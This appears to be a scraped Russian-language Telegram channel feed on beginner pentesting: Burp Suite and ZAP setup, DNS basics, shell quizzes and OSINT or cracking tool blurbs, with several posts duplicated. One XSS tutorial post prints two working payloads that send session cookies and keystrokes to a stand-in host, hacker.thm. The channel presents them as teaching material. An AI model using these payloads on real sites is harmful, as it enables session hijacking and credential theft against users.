Kali Linux
💣Изменение и модификация трафика Ч.1💣 Изменение и модификация трафика является очень важной частью Пентестинга в целом. Давайте рассмотрим с помощью чего можно производить такие манипуляции. Burp Suite - очень важное программное обеспечение. Именно с помощью…
💣Изменение и модификация трафика Ч.2💣
В прошлом посте Вы узнали об основах работы с таким фреймворком как Burp Suite. Сегодня продолжим говорить на эту тему и постараемся закончить серию постов про это программное обеспечение.
Для того чтобы работать с HTTPS траффиком вам надо будет установить сертификат Burp Suite в ваш браузер. Делается это достаточно просто. Для установки надо зайти в ваш фреймворк и скачать его оттуда. После импортировать в браузер. Желательно использовать Mozilla Firefox.
Для того, чтобы было удобней настраивать свои прокси на которых работает Burp вам следует установить Foxy Proxy. С помощью этого П.О вы сможете не заходить в настройки прокси Вашего браузера для того чтобы отключить "проксирование" для Burp. Теперь это можно будет делать в один клик.
Имеет смысл понять как проводить SQL инъекции и XSS атаки а так-же обзавестись огромным количество полезных нагрузок на любой случай жизни, которые вы сможете выпускать как торпеды. Но только разумеется на CTF или если вы работаете в секторе информационной безопасности!
Подумайте про порты. Обычно такое программное обеспечение как Burp Suite стоит на портах по типу 8080 и тд. Вспомните что от настройки портов зависит ваша дальнейшая работоспособность, так как если вы где-то "протупите" то ничего работать не будет. Помните что все остальное П.О можно разместить на 8081 8082 и так далее портах.
@linuxkalii
В прошлом посте Вы узнали об основах работы с таким фреймворком как Burp Suite. Сегодня продолжим говорить на эту тему и постараемся закончить серию постов про это программное обеспечение.
Для того чтобы работать с HTTPS траффиком вам надо будет установить сертификат Burp Suite в ваш браузер. Делается это достаточно просто. Для установки надо зайти в ваш фреймворк и скачать его оттуда. После импортировать в браузер. Желательно использовать Mozilla Firefox.
Для того, чтобы было удобней настраивать свои прокси на которых работает Burp вам следует установить Foxy Proxy. С помощью этого П.О вы сможете не заходить в настройки прокси Вашего браузера для того чтобы отключить "проксирование" для Burp. Теперь это можно будет делать в один клик.
Имеет смысл понять как проводить SQL инъекции и XSS атаки а так-же обзавестись огромным количество полезных нагрузок на любой случай жизни, которые вы сможете выпускать как торпеды. Но только разумеется на CTF или если вы работаете в секторе информационной безопасности!
Подумайте про порты. Обычно такое программное обеспечение как Burp Suite стоит на портах по типу 8080 и тд. Вспомните что от настройки портов зависит ваша дальнейшая работоспособность, так как если вы где-то "протупите" то ничего работать не будет. Помните что все остальное П.О можно разместить на 8081 8082 и так далее портах.
@linuxkalii
👍7🔥3❤2
👁🗨5 Советов начинающему пентестеру?👁🗨
🐍Огромное количество молодых людей которым интересна данная тема, не знают с чего начать и как подступиться. Сегодня я предоставлю 5 советов, которые должны вам помочь.
1. Выберите правильный обучающий ресурс. На данный момент в интернете как минимум две платформы которые помогут Вам научится хакингу. Это Tryhackme и hackthebox.
2. Как и любая другая отрасль пентестинг требует вашего времени. Тратьте его с умом. Имеет смысл отдавать все свободное время. Но если вы перестанете спать и будете только этим заниматься ваш КПД точно упадет. Знаю по себе.
3. Не слушайте специалистов по безопасности которые говорят что сейчас все атаки проводятся с помощью фишинга. Это полный бред. Такие люди по каким-то причинам хотят сбить вас с пути.
4. Всегда просите о помощи если чего-то не понимаете. Иначе будете застревать на одном моменте на несколько суток. А может быть и на неделю. Помощь - это ок!
5. Старайтесь больше практиковаться. Таким образом, вы заметите успех.
Так же хочу сказать, что зачастую у всех CTF есть свой уровень сложности. Опираясь на это, Вам следует начать с самого простого, предварительно выучив много много теории.
Вы всегда можете найти комьюнити которое может Вам помочь, достаточно задать вопрос на StuckOverflow или же в it чатах в телеграме. Помните что вы не один и все получится.
@linuxkalii
🐍Огромное количество молодых людей которым интересна данная тема, не знают с чего начать и как подступиться. Сегодня я предоставлю 5 советов, которые должны вам помочь.
1. Выберите правильный обучающий ресурс. На данный момент в интернете как минимум две платформы которые помогут Вам научится хакингу. Это Tryhackme и hackthebox.
2. Как и любая другая отрасль пентестинг требует вашего времени. Тратьте его с умом. Имеет смысл отдавать все свободное время. Но если вы перестанете спать и будете только этим заниматься ваш КПД точно упадет. Знаю по себе.
3. Не слушайте специалистов по безопасности которые говорят что сейчас все атаки проводятся с помощью фишинга. Это полный бред. Такие люди по каким-то причинам хотят сбить вас с пути.
4. Всегда просите о помощи если чего-то не понимаете. Иначе будете застревать на одном моменте на несколько суток. А может быть и на неделю. Помощь - это ок!
5. Старайтесь больше практиковаться. Таким образом, вы заметите успех.
Так же хочу сказать, что зачастую у всех CTF есть свой уровень сложности. Опираясь на это, Вам следует начать с самого простого, предварительно выучив много много теории.
Вы всегда можете найти комьюнити которое может Вам помочь, достаточно задать вопрос на StuckOverflow или же в it чатах в телеграме. Помните что вы не один и все получится.
@linuxkalii
👍32❤6🔥5
Если в директории есть файлы fileA, fileB, fileAB, fileBC и fileABC, какие из них подпадут под шаблон file[ABC]?
Anonymous Quiz
17%
fileA, fileB и fileABC
42%
fileABC
17%
fileA и fileB
24%
fileAB, fileBC и fileABC
👍14🔥6❤3👏3😁1
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥6❤3👎1
Какая зарезервированная переменная используется для вывода общего количества параметров, переданных скрипту?
Anonymous Quiz
16%
$0
35%
$#
32%
$*
18%
$?
😁8❤6👍5🔥4
Сниффер сетевого трафика, работающий в терминале, и предназначен для устранения неполадок в сети.
Его можно запускать в любое время для анализа процессов или соединений, вызывающих увеличение сетевого трафика, без загрузки каких-либо модулей ядра.
$ sudo apt-get install libpcap-dev@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥6❤3🤔1
Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.
#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.
Почему бы мне не использовать Burp Suite?
Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.
#Преимущества OWASP ZAP?
Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.
#Установка
OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.
Скачайте и установите с официального сайта: https://www.zaproxy.org/download/
#Автоматичесское сканирование
Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.
ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.
#Ручное сканирование
Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.
На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥6❤4
👁🗨DNS в деталях
Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.
Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.
Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.
1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.
Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.
Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов
@linuxkalii
Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.
Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.
Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.
1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.
Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.
Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов
@linuxkalii
👍18🔥3❤1👎1
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
🖥 Github
@linuxkalii
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍8❤2
Сегодня речь пойдет о повышении привилегий на Linux системах.
Чтобы сразу не углубляться в дебри, имеет смысл сказать, что есть администратор (root) и другие пользователи, имена у которых могут быть разные. Зависит от воображения.
Пользователи делятся на группы, котором администратор назначает доступ к различным файлам и командам. Нас интересует команда sudo.
Sudo (англ. Substitute User and do, дословно «подменить пользователя и выполнить») — программа для системного администрирования UNIX-систем, позволяющая делегировать те или иные привилегированные ресурсы пользователям с ведением протокола работы.
Например:
Sudo whoami. Данная команда запустит команду whoami от лица root пользователя, которую в свою очередь скажет нам, "под каким" пользователем мы находимся в системе.
Смысл заключается в том, что мы можем эксплуатировать не правильные системные настройки или же версию ядра для получения более высоких привилегий в системе. Об этом я расскажу чуть позже. Важно понять азы.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍6❤1
🔥 Полезные библиотеки Python
Osintgram - инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.
⚙️ Инструкция по установке/использованию 👇
🖥 GitHub
@linuxkalii
Osintgram - инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.
⚙️ Инструкция по установке/использованию 👇
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤1🔥1
Многие из нас уже имели дело с командной строкой. Этот классический текстовый интерфейс позволяет выполнять все необходимые задачи, с которыми не справляется GUI. Иногда работа с терминалом требует максимального погружения.
Любой универсальный разработчик должен владеть основными навыками использования командной строки: освоить принцип работы, научиться редактировать файлы, настраивать приложения и т.д. При этом совсем необязательно работать с черно-белым скучным интерфейсом. Почему бы не воспользоваться интересными и визуально эффектными программами для командной строки, которые обновляют ее внешнюю эстетику?
В статье мы проведем обзор сторонних программ, которые улучшают внешний вид консоли. И пусть совершенные функциональные возможности и производительность не входят в число главных приоритетов таких программ, зато они взрывают унылый интерфейс буйством красок.
▪ Читать
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤3
Установка:
$ git clone https://github.com/githacktools/TorghostNG
$ cd TorghostNG
$ sudo python3 install.py
Использование:
$ sudo torghostng
⚙️ GitHub/Инструкция
#python #soft #github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤4🔥4
✔ XSS уязвимости на примере
Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!
#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.
#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.
1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.
💣
2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.
💣
#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.
Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.
После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.
@linuxkalii
Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!
#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.
#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.
1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.
💣
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.
💣
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.
Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.
После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.
@linuxkalii
👍16❤3🔥3
✖ Nrich инструмент для сканирования портов и поиска уязвимостей.
Новый инструмент командной строки для быстрого анализа списка IP-адресов и просмотра открытых портов и уязвимостей.
▪ Gitlab
@linuxkalii
Новый инструмент командной строки для быстрого анализа списка IP-адресов и просмотра открытых портов и уязвимостей.
▪ Gitlab
@linuxkalii
🔥26❤5👍4🥰1
⚡️ XSS уязвимости на примере Ч.2
Это вторая часть серии постов про XSS уязвимости на примере. Сегодня постараюсь рассмотреть и показать Вам принцип работы XSS "Хранимого" типа. Погнали.
#Хранимые XSS
Хранимые XSS это тип Кросс-сайт сриптинга где, полезная нагрузка которого обрабатывается на серверной стороне. А именно взаимодействует с базами данных.
#Принцип действия
Веб-сайт блог, который позволяет пользователям публиковать комментарии. К сожалению, эти комментарии не проверяются на предмет того, содержат ли они JavaScript или отфильтровывают какой-либо вредоносный код. И если мы сейчас опубликуем комментарий, содержащий JavaScript, он будет сохранен в базе данных, и у каждого другого пользователя, который сейчас посещает статью, будет запускаться JavaScript в своем браузере.
Таким образом, вредоносный код который мы встраиваем в Java Script, в качестве полезной нагрузки позволяет нам перенаправлять пользователей на другой сайт, который может быть нашим фишинговым сайтом, красть cookie файлы, и даже установить обратное подключение.
1 часть
@linuxkalii
Это вторая часть серии постов про XSS уязвимости на примере. Сегодня постараюсь рассмотреть и показать Вам принцип работы XSS "Хранимого" типа. Погнали.
#Хранимые XSS
Хранимые XSS это тип Кросс-сайт сриптинга где, полезная нагрузка которого обрабатывается на серверной стороне. А именно взаимодействует с базами данных.
#Принцип действия
Веб-сайт блог, который позволяет пользователям публиковать комментарии. К сожалению, эти комментарии не проверяются на предмет того, содержат ли они JavaScript или отфильтровывают какой-либо вредоносный код. И если мы сейчас опубликуем комментарий, содержащий JavaScript, он будет сохранен в базе данных, и у каждого другого пользователя, который сейчас посещает статью, будет запускаться JavaScript в своем браузере.
Таким образом, вредоносный код который мы встраиваем в Java Script, в качестве полезной нагрузки позволяет нам перенаправлять пользователей на другой сайт, который может быть нашим фишинговым сайтом, красть cookie файлы, и даже установить обратное подключение.
1 часть
@linuxkalii
🔥14👍7❤1
Поисковая система умеет искать по домену, заголовку страницы, протоколу, местоположению, сертификатам, http-заголовкам, ASN, названию продукта и др.
⚙️ Инструмент
#infosec #search
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤10🔥2
LogonTracer
Софт связывает имя хоста (или IP-адрес) и имя учетной записи, обнаруженные в событиях, связанных со входом в систему, и отображает их в виде графа.
#Пентес
🖥 GitHub
@linuxkalii
Софт связывает имя хоста (или IP-адрес) и имя учетной записи, обнаруженные в событиях, связанных со входом в систему, и отображает их в виде графа.
#Пентес
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤10🔥1
Octosuite
Octosuite - продвинутый и полезный OSINT инструмент для сбора информации о пользователях, репозиториях и организациях GitHub с открытым исходным кодом.
🖥 Github
@linuxkalii
Octosuite - продвинутый и полезный OSINT инструмент для сбора информации о пользователях, репозиториях и организациях GitHub с открытым исходным кодом.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤7🔥2
🔐 Hashcat
Hashcat известен в сообществе экспертов по безопасности как самая быстрая и продвинутая утилита для взлома паролей и восстановления.
Этот проект с открытым исходным кодом, механизмом обработки правил в ядре, более 300 типов хешей и встроенной системой бенчмаркинга.
🖥 Github
@linuxkalii
Hashcat известен в сообществе экспертов по безопасности как самая быстрая и продвинутая утилита для взлома паролей и восстановления.
Этот проект с открытым исходным кодом, механизмом обработки правил в ядре, более 300 типов хешей и встроенной системой бенчмаркинга.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25❤10🔥3🤔1
📡 Athena OS
Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.
#Linux #Pentest #Arch
🖥 Github
@linuxkalii
Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.
#Linux #Pentest #Arch
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍30❤15🔥2